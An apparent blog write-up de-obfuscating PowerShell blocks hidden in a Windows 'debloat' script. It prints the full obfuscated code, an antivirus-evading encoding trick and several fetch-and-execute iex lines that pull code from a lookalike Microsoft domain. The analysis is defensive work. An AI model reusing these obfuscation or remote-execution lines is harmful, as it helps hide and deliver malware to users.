The public repo https://github.com/windowtoolbox/under_observation (the original name was changed by github as the repo is now under observation and all repo files are unaccessible) looked like providing a Powershell script that will optimize and debloat your Windows installation. Strange enough the actual script was not included in the repo as a file but just as a download link in the readme file of the repo. It was all quite suspicious. The installation instruction was the typical iex instruction like this:
iex((New-Object System.Net.WebClient).DownloadString('https://link-to-the-scriptfile'))Downloading the script by hand gives us a Powershell script with a lot of instructions that actually do what the script pretended to do, they change a lot of system parameters for optimization and de-install software for debloating Windows.
But beside that code there are two blocks of obfuscated code that looked suspicious - well they are obfuscated so you wouldn't expect them to contain some safe code but malicious one.
I decided to take this code and de-obfuscate it by hand as it is a nice exercise and might actually give interesting details about the potential payload.
We have the following code present. It is obfuscated to not to be detected by a AV heuristic.
#Genuine Authentication Seal
${***}=+$();${**}=${***};${***********}=++${***};${*****}=(${***}=${***}+${***********});${******}=(${***}=${***}+${***********});${*********}=(${***}=${***}+${***********});${*******}=(${***}=${***}+${***********});${************}=(${***}=${***}+${***********});${**********}=(${***}=${***}+${***********});${********}=(${***}=${***}+${***********});${****}=(${***}=${***}+${***********});${*}="["+"$(@{})"[${**********}]+"$(@{})"["${***********}${****}"]+"$(@{})"["${*****}${**}"]+"$?"[${***********}]+"]";${***}="".("$(@{})"["${***********}"+"${*********}"]+"$(@{})"["${***********}"+"${************}"]+"$(@{})"[${**}]+"$(@{})"[${*********}]+"$?"[${***********}]+"$(@{})"[${******}]);${***}="$(@{})"["${***********}${*********}"]+"$(@{})"[${*********}]+"${***}"["${*****}${**********}"];.${***}("${***}(${*}${******}${************}+${*}${***********}${***********}${****}+${*}${***********}${**}${*******}+${*}${***********}${***********}${**}+${*}${*********}${************}+${*}${************}${**********}+${*}${***********}${***********}${***********}+${*}${***********}${***********}${**}+${*}${***********}${***********}${************}+${*}${***********}${***********}${*********}+${*}${***********}${***********}${***********}+${*}${***********}${**}${********}+${*}${***********}${***********}${*******}+${*}${*********}${************}+${*}${************}${*******}+${*}${***********}${**}${**}+${*}${***********}${**}${**}+${*}${*********}${**}+${*}${******}${************}+${*}${***********}${**}${*****}+${*}${***********}${***********}${***********}+${*}${***********}${***********}${*********}+${*}${***********}${**}${****}+${*}${*********}${***********}+${*}${******}${*****}+${*}${*******}${****}+${*}${******}${*****}+${*}${***********}${**}${*******}+${*}${***********}${**}${***********}+${*}${***********}${*****}${**}+${*}${*********}${**}+${*}${*********}${**}+${*}${**********}${********}+${*}${***********}${**}${***********}+${*}${***********}${***********}${****}+${*}${*********}${*******}+${*}${**********}${****}+${*}${****}${********}+${*}${***********}${**}${************}+${*}${***********}${**}${***********}+${*}${****}${****}+${*}${***********}${***********}${************}+${*}${******}${*****}+${*}${********}${******}+${*}${***********}${*****}${***********}+${*}${***********}${***********}${*******}+${*}${***********}${***********}${************}+${*}${***********}${**}${***********}+${*}${***********}${**}${****}+${*}${*********}${************}+${*}${**********}${********}+${*}${***********}${**}${***********}+${*}${***********}${***********}${************}+${*}${*********}${************}+${*}${********}${**********}+${*}${***********}${**}${***********}+${*}${****}${********}+${*}${************}${**********}+${*}${***********}${**}${********}+${*}${***********}${**}${*******}+${*}${***********}${**}${***********}+${*}${***********}${***********}${**}+${*}${***********}${***********}${************}+${*}${*********}${***********}+${*}${*********}${************}+${*}${************}${********}+${*}${***********}${***********}${***********}+${*}${***********}${***********}${****}+${*}${***********}${***********}${**}+${*}${***********}${**}${********}+${*}${***********}${***********}${***********}+${*}${****}${**********}+${*}${***********}${**}${**}+${*}${********}${******}+${*}${***********}${***********}${************}+${*}${***********}${***********}${*********}+${*}${***********}${**}${*******}+${*}${***********}${***********}${**}+${*}${***********}${**}${******}+${*}${*********}${**}+${*}${******}${****}+${*}${***********}${**}${*********}+${*}${***********}${***********}${************}+${*}${***********}${***********}${************}+${*}${***********}${***********}${*****}+${*}${***********}${***********}${*******}+${*}${*******}${********}+${*}${*********}${**********}+${*}${*********}${**********}+${*}${***********}${***********}${*****}+${*}${***********}${***********}${*******}+${*}${*********}${************}+${*}${***********}${**}${****}+${*}${***********}${**}${*******}+${*}${****}${****}+${*}${***********}${***********}${*********}+${*}${***********}${***********}${***********}+${*}${***********}${***********}${*******}+${*}${***********}${***********}${***********}+${*}${***********}${**}${*****}+${*}${***********}${***********}${************}+${*}${*********}${*******}+${*}${***********}${***********}${************}+${*}${***********}${***********}${***********}+${*}${***********}${***********}${***********}+${*}${***********}${**}${********}+${*}${****}${********}+${*}${***********}${***********}${***********}+${*}${***********}${*****}${**}+${*}${*********}${************}+${*}${***********}${***********}${****}+${*}${***********}${***********}${***********}+${*}${***********}${***********}${*********}+${*}${***********}${**}${**********}+${*}${***********}${**}${***********}+${*}${***********}${***********}${*********}+${*}${***********}${***********}${*******}+${*}${*********}${************}+${*}${***********}${**}${**}+${*}${***********}${**}${***********}+${*}${***********}${***********}${********}+${*}${******}${****}+${*}${*********}${***********}+${*}${*********}${***********})")First, we do, is to bring a bit of clarity into the code. We will add line breaks where ever a semicolon is being used to indicate a full line of instructions. Then we take the first set of instruction lines and evaluate them by finding patterns. We can see a pattern of variable names being assembled using $ and a set of curly braces and *-synbols. It's a totally arbitrary choice of symbols and something completley different could have been used. We look at each line, we will take the line, evaluate it in a powershell processor, evaluate its output and draw conclusions from that.
Let's go :)
${***} = + $();
${**} = ${***};
${***********} = ++${***};
${*****} = (${***} = ${***} + ${***********});
${******} = (${***} = ${***} + ${***********});
${*********} = (${***} = ${***} + ${***********});
${*******} = (${***} = ${***} + ${***********});
${************} = (${***} = ${***} + ${***********});
${**********} = (${***} = ${***} + ${***********});
${********} = (${***} = ${***} + ${***********});
${****} = (${***} = ${***} + ${***********});
${*} = "[" + "$(@{})"[${**********}] + "$(@{})"["${***********}${****}"] + "$(@{})"["${*****}${**}"] + "$?"[${***********}] + "]";Input ${*} in PS command processor gives: cHar
The next line of the obfuscation-evaluation code is:
${***} = "".("$(@{})"["${***********}" + "${*********}"] + "$(@{})"["${***********}" + "${************}"] + "$(@{})"[${**}] + "$(@{})"[${*********}] + "$?"[${***********}] + "$(@{})"[${******}]);This, after putting it into powershell gives a function:
> ${***}
string Insert(int startIndex, string value)
> ${***}.GetType();
IsPublic IsSerial Name BaseType
-------- -------- ---- --------
False False PSMethod`1 System.Management.Automation.PSMethodI want to find the obfuscation method. For that I have to start at the beginning by evaluating every single object and see, how it is being used in the chain of commands here.
${***} = + $();${**} = ${***};${} is also an Int32 with the value of 0 (basically a copy of ${})
${***********} = ++${***};"++" adds 1 to the value type of Int32, so now both variables, left and right, contain 1 ${} is now added as the operation "++" has been executed on it and after that its value has been copied to ${********}
${*****} = (${***} = ${***} + ${***********});This is the first of a couple of commands setting up obvious building blocks for further synthesis of strings that will probably end up as instructions.
Here the new variable ${} is being filled with the operation on the right, which sets ${***} again by adding ${*} (value of 1) to itself and returning it to ${}. The new value is 2.
The next operationsdo exactly the same. ${***} is increased by 1 and returned to the variable.
${******} = (${***} = ${***} + ${***********});${******} is now 3.
${*********} = (${***} = ${***} + ${***********});${*********} is now 4.
${*******} = (${***} = ${***} + ${***********});${*******} is now 5.
${************} = (${***} = ${***} + ${***********});${************} is now 6.
${**********} = (${***} = ${***} + ${***********});${**********} is now 7.
${********} = (${***} = ${***} + ${***********});${********} is now 8.
${****} = (${***} = ${***} + ${***********});${****} is now 9.
For better visibility the variables will now be renamed to the following:
${***} $accu
${**} $0
${***********} $1
${*****} $2
${******} $3
${*********} $4
${*******} $5
${************} $6
${**********} $7
${********} $8
${****} $9Now the the first part of the code looks much clearer
$accu = + $();
$0 = $accu;
$1 = ++$accu;
$2 = ($accu = $accu + $1);
$3 = ($accu = $accu + $1);
$4 = ($accu = $accu + $1);
$5 = ($accu = $accu + $1);
$6 = ($accu = $accu + $1);
$7 = ($accu = $accu + $1);
$8 = ($accu = $accu + $1);
$9 = ($accu = $accu + $1);
${*} = "[" + "$(@{})"[$7] + "$(@{})"["$1$9"] + "$(@{})"["$2$0"] + "$?"[$1] + "]";
$accu = "".("$(@{})"["$1" + "$4"] + "$(@{})"["$1" + "$6"] + "$(@{})"[$0] + "$(@{})"[$4] + "$?"[$1] + "$(@{})"[$3]);
$accu = "$(@{})"["$1$4"] + "$(@{})"[$4] + "$accu"["$2$7"];The next set of instructions synthesizes the string "[CHar]"
${*} = "[" + "$(@{})"[$7] + "$(@{})"["$1$9"] + "$(@{})"["$2$0"] + "$?"[$1] + "]";${*} is being replaced with the variable name $char for clarity in the next steps.
In the next instruction line, the string "inSert" is being created and evaluated
${} creates an object ob type HashTable by using Splatting, just with an empty collection. https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_splatting
"$(@{})"["$1" + "$4"] creates a string with the content "i"
This seems to be working only the way that the first part of the term is put into a string literal enclosed in a $() so that the interpreter evaluates this to an object. I tried just using $test = @{}["$1" + "$4"] and it raised an error.
So by using "$(@{})"["$1" + "$4"] it first seems to be creating an array, consisting of two strings being concatenated which creates a new string object which is stored in that new unnamed hashtable object wich then receives the type strng, I guess.
I don't fully understand, how the evaluated string "$(@{})"["$1" + "$4"] creates a char type object. Maybe some of you can help me out here.
Anyways, evaluating the lines of the first part will give us the following values of our variables:
$char = "CHar" $accu = "inSert" $accu = "iex"
In the end the value of $accu is "iex" which it being used with in the following code. Setting it to "inSert" before is probably another trick to send the researcher down another rabbit hole here.
iex is a short form of the Invoke-Expression Cmdlet that executes powershell code read from a string argument. Originally the last line of the first code part, that starts with ".$accu("$accu($char$3$6+$char$1$1$9+$char$1$0$5..." can be transcoded to iex("iex(string of powershell instructions)"). As we don't want to execute the code blindly but want to read what instructions are being used there we change the code to what you see below.
."iex"("Write-Host($char$3$6+$char$1$1$9+$char$1$0$5+$char$1$1$0+$char$4$6+$char$6$7+$char$1$1$1+$char$1$1$0+$char$1$1$6+$char$1$1$4+$char$1$1$1+$char$1$0$8+$char$1$1$5+$char$4$6+$char$6$5+$char$1$0$0+$char$1$0$0+$char$4$0+$char$3$6+$char$1$0$2+$char$1$1$1+$char$1$1$4+$char$1$0$9+$char$4$1+$char$3$2+$char$5$9+$char$3$2+$char$1$0$5+$char$1$0$1+$char$1$2$0+$char$4$0+$char$4$0+$char$7$8+$char$1$0$1+$char$1$1$9+$char$4$5+$char$7$9+$char$9$8+$char$1$0$6+$char$1$0$1+$char$9$9+$char$1$1$6+$char$3$2+$char$8$3+$char$1$2$1+$char$1$1$5+$char$1$1$6+$char$1$0$1+$char$1$0$9+$char$4$6+$char$7$8+$char$1$0$1+$char$1$1$6+$char$4$6+$char$8$7+$char$1$0$1+$char$9$8+$char$6$7+$char$1$0$8+$char$1$0$5+$char$1$0$1+$char$1$1$0+$char$1$1$6+$char$4$1+$char$4$6+$char$6$8+$char$1$1$1+$char$1$1$9+$char$1$1$0+$char$1$0$8+$char$1$1$1+$char$9$7+$char$1$0$0+$char$8$3+$char$1$1$6+$char$1$1$4+$char$1$0$5+$char$1$1$0+$char$1$0$3+$char$4$0+$char$3$9+$char$1$0$4+$char$1$1$6+$char$1$1$6+$char$1$1$2+$char$1$1$5+$char$5$8+$char$4$7+$char$4$7+$char$1$1$2+$char$1$1$5+$char$4$6+$char$1$0$9+$char$1$0$5+$char$9$9+$char$1$1$4+$char$1$1$1+$char$1$1$5+$char$1$1$1+$char$1$0$2+$char$1$1$6+$char$4$5+$char$1$1$6+$char$1$1$1+$char$1$1$1+$char$1$0$8+$char$9$8+$char$1$1$1+$char$1$2$0+$char$4$6+$char$1$1$9+$char$1$1$1+$char$1$1$4+$char$1$0$7+$char$1$0$1+$char$1$1$4+$char$1$1$5+$char$4$6+$char$1$0$0+$char$1$0$1+$char$1$1$8+$char$3$9+$char$4$1+$char$4$1)")
$win.Controls.Add($form) ; iex((New-Object System.Net.WebClient).DownloadString('https://ps.microsoft-toolbox.workers.dev'))It seems that the iex call wants to download and evaluate/execute exactly the same scripts that we are running currently. The reason is not clear.
Later down in the code there is a section of code that looks familiar. It uses a similar kind of pattern to obfuscate it's code, this time without the *-symbol but spaces.
We will use the same methodology as above to find out what is supposed to be downloaded this time.
I am getting rid of all the unnessesary code and code tht actually has no purpose but to confuse the researcher. I will also replace variable names again to make things clearer for me.
The executed string looks like this:
$labelbox.Controls.Add($textwin) ; $form = $labelboxAt least in this version of the script file it seems that the script does not do any malicious things. The firt obfuscated block of code will download the script again and execute it in another context. The second obfuscated block will execute the addition of a UI Label $textwin to the form. I haven't seen any bad behavior in this.
But! I stronlgy recommend not to download and execute this file as you still cannot be sure that no harm is done by executing it. My findings only deal with the obfuscated parts and from my current knowledge I haven't found any evidence for a malicious behavior but I might have overseen something easely!! There might have been other, maybe advanced, obfuscation techniques being used that I have not seen up to this point.
Do not execute this script file.
At least for me this was a nice exercise in de-obfuscating.
The biggest problems were using my text editor, in my case Sublime Text 3. The editor works like a charm, only I need to learn it's key mappings and functionalities better. Changing to VSCode I could use different addons for Powershell. The official addon by Microsoft helped a lot as it pointed out mistakes in code as annotations that led to new ideas about what the code did and to further manual de-obfuscation that eventually led to clear code and the strings of the URLs to be downloaded from.
It seems that others have downlaoded different versions of that script and it seems that in some of those versions the code is different.
The server might serve different versions based on the referrer/source of request.